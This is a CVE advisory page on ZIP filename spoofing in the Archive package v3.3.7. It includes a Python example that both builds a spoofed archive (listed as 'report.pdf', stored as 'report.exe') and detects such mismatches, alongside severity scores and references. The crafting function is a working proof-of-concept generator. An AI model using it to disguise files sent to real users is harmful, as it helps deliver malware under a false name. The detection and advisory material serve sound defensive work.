Vulnerability Details: CVE-2023-39137
An issue in the Archive package v3.3.7 (brendan-duncan/archive) allows attackers to spoof ZIP filenames, which can lead to inconsistent filename parsing. A ZIP stores each entry's filename twice, once in the entry's local file header and once in the central directory, and the format does not require them to agree; a reader that takes the name from one structure while handling the entry through the other can be made to list a file under one name and write it under another.
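The following Python script is an added worked example, not code from the Archive package or from any of the references on this page. It builds a one-entry ZIP whose local file header names the entry `report.exe` while the central directory names it `report.pdf`, shows that a central-directory walk and a sequential local-header walk return different names for the same bytes, and implements the cross-check an extractor should run before writing anything to disk. It also uses CPython's standard `zipfile` as a reference point for what a hardened reader does. The filenames, payload and timestamp are constructed sample data, and all function names are the example's own.

```python
"""Craft a ZIP whose two filename copies disagree, then detect the mismatch."""
import io
import struct
import zipfile
import zlib

LFH_SIG = b"PK\x03\x04"    # local file header signature
CDH_SIG = b"PK\x01\x02"    # central directory file header signature
EOCD_SIG = b"PK\x05\x06"   # end of central directory record signature
LFH_FMT = "<4sHHHHHIIIHH"         # 30-byte fixed part of a local file header
CDH_FMT = "<4sHHHHHHIIIHHHHHII"   # 46-byte fixed part of a central directory entry
EOCD_FMT = "<4sHHHHIIH"           # 22-byte end of central directory record
MOD_TIME, MOD_DATE = 0x6000, 0x5701   # MS-DOS 12:00:00, 2023-08-01 (arbitrary sample)


def build_spoofed_zip(local_name: bytes, central_name: bytes, payload: bytes) -> bytes:
    """Build a one-entry, stored (uncompressed) ZIP whose local file header and
    central directory entry carry different filenames. Everything else (CRC,
    sizes, offsets) is consistent, so ordinary tools accept the archive."""
    crc, size = zlib.crc32(payload) & 0xFFFFFFFF, len(payload)
    lfh = struct.pack(LFH_FMT, LFH_SIG, 20, 0, 0, MOD_TIME, MOD_DATE,
                      crc, size, size, len(local_name), 0)
    local_record = lfh + local_name + payload
    cdh = struct.pack(CDH_FMT, CDH_SIG, 20, 20, 0, 0, MOD_TIME, MOD_DATE,
                      crc, size, size, len(central_name), 0, 0, 0, 0, 0,
                      0)  # final field: offset of the local file header (0)
    central_record = cdh + central_name
    eocd = struct.pack(EOCD_FMT, EOCD_SIG, 0, 0, 1, 1,
                       len(central_record), len(local_record), 0)
    return local_record + central_record + eocd


def names_from_central_directory(data: bytes) -> list[tuple[bytes, int]]:
    """Walk the central directory (what most archivers trust for listings) and
    return (filename, local_header_offset) for each entry."""
    eocd_pos = data.rfind(EOCD_SIG)
    if eocd_pos < 0:
        raise ValueError("no end-of-central-directory record")
    total, _cd_size, cd_offset = struct.unpack_from(EOCD_FMT, data, eocd_pos)[4:7]
    entries, pos = [], cd_offset
    for _ in range(total):
        f = struct.unpack_from(CDH_FMT, data, pos)
        if f[0] != CDH_SIG:
            raise ValueError("bad central directory signature")
        name_len, extra_len, comment_len, lfh_offset = f[10], f[11], f[12], f[16]
        entries.append((data[pos + 46:pos + 46 + name_len], lfh_offset))
        pos += 46 + name_len + extra_len + comment_len
    return entries


def names_from_local_headers(data: bytes) -> list[bytes]:
    """Walk local file headers sequentially from offset 0 (what a streaming
    extractor sees). Assumes no data descriptors (general-purpose bit 3 clear)."""
    names, pos = [], 0
    while data[pos:pos + 4] == LFH_SIG:
        f = struct.unpack_from(LFH_FMT, data, pos)
        csize, name_len, extra_len = f[7], f[9], f[10]
        names.append(data[pos + 30:pos + 30 + name_len])
        pos += 30 + name_len + extra_len + csize
    return names


def find_name_mismatches(data: bytes) -> list[tuple[bytes, bytes]]:
    """Cross-check each central directory entry against the local header it
    points to. A hardened extractor rejects the archive if this is non-empty."""
    mismatches = []
    for cd_name, off in names_from_central_directory(data):
        f = struct.unpack_from(LFH_FMT, data, off)
        if f[0] != LFH_SIG:
            raise ValueError("central directory points at a non-header offset")
        lfh_name = data[off + 30:off + 30 + f[9]]
        if cd_name != lfh_name:
            mismatches.append((cd_name, lfh_name))
    return mismatches


def stdlib_view(data: bytes) -> tuple[list[str], bool]:
    """CPython's zipfile as a reference point: namelist() is taken from the
    central directory, while open()/read() re-reads the local file header and
    raises BadZipFile when its name differs. Returns (names, mismatch_rejected)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        try:
            zf.read(names[0])
        except zipfile.BadZipFile:
            return names, True
    return names, False


# Constructed sample: the directory listing says "report.pdf", the local file
# header (which some extractors use for the on-disk name) says "report.exe".
SAMPLE = build_spoofed_zip(b"report.exe", b"report.pdf", b"MZ not really a PE\n")

if __name__ == "__main__":
    print("central directory:", [n for n, _ in names_from_central_directory(SAMPLE)])
    print("local headers:    ", names_from_local_headers(SAMPLE))
    print("mismatches:       ", find_name_mismatches(SAMPLE))
    print("stdlib zipfile:   ", stdlib_view(SAMPLE))
```

The point of the two walkers is that both are valid ways to read a ZIP, and a listing produced by one combined with an extraction driven by the other is exactly the inconsistency the advisory describes; `find_name_mismatches` is the check that closes the gap, and any archive that trips it should be refused rather than repaired.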
Products affected by CVE-2023-39137
- cpe:2.3:a:archive_project:archive:3.3.7:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2023-39137
EPSS score: 0.06% (probability of exploitation activity in the next 30 days)
EPSS percentile: ~26% (the proportion of vulnerabilities scored at or below this one)
CVSS scores for CVE-2023-39137
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen
---|---|---|---|---|---|---
7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | 1.8 | 5.9 | NIST |
CWE ids for CVE-2023-39137
- The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. Assigned by: 134c704f-9b21-4f2e-91b3-4a467353bcc0 (Secondary)
References for CVE-2023-39137
- https://blog.ostorlab.co/zip-packages-exploitation.html ("ZIP Exploitation: Critical Vulnerabilities Found in Popular Zip Libraries in Swift and Flutter", Ostorlab blog; tagged Exploit)
- https://github.com/brendan-duncan/archive/issues/266 ("Archive package is vulnerable to zip filename spoofing", issue #266 in brendan-duncan/archive; tagged Issue Tracking)
- https://www.rapid7.com/db/modules/exploit/windows/fileformat/winrar_name_spoofing/ ("WinRAR Filename Spoofing", Rapid7 module page; tagged Third Party Advisory)
- https://ostorlab.co/vulndb/advisory/OVE-2023-3 (Ostorlab VulnDB advisory OVE-2023-3; tagged Exploit)